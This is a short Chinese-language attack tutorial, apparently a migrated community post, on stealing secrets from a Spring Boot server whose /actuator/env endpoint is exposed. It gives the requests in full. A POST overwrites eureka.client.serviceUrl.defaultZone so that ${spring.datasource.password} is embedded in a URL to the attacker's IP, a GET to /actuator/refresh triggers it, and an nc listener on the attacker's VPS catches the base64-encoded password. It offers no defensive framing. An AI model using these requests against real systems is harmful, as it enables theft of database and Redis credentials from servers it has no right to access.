spring boot里面env一般会存在服务器的敏感信息,像是数据库账号名密码、redis账号密码等。
一、鉴别:
直接访问 ip:port/actuator/env
可以看到mysql的账户名与密码(密码是被加密了),这个时候就可以尝试利用了。
二、利用
${}是你要获取的敏感信息
@后面是你监听服务器的IP与端口
发送post包:
POST /actuator/env HTTP/1.1
Host: IP😛ORT
Content-Type: application/json
Connection: close
Content-Length: *
{"name":"eureka.client.serviceUrl.defaultZone","value":"http://value:${spring.datasource.password}@ip:port"}
然后在刷新一下配置:
GET /actuator/refresh HTTP/1.1
Host: IP😛ORT
Content-Type: application/x-www-form-urlencoded
Connection: close
然后在自己的vps上面监听
[root@root]# nc -lvk 8787
拿到这个然后bash64解密就行
尝试连接一下
本文迁移自知识星球“火线Zone”
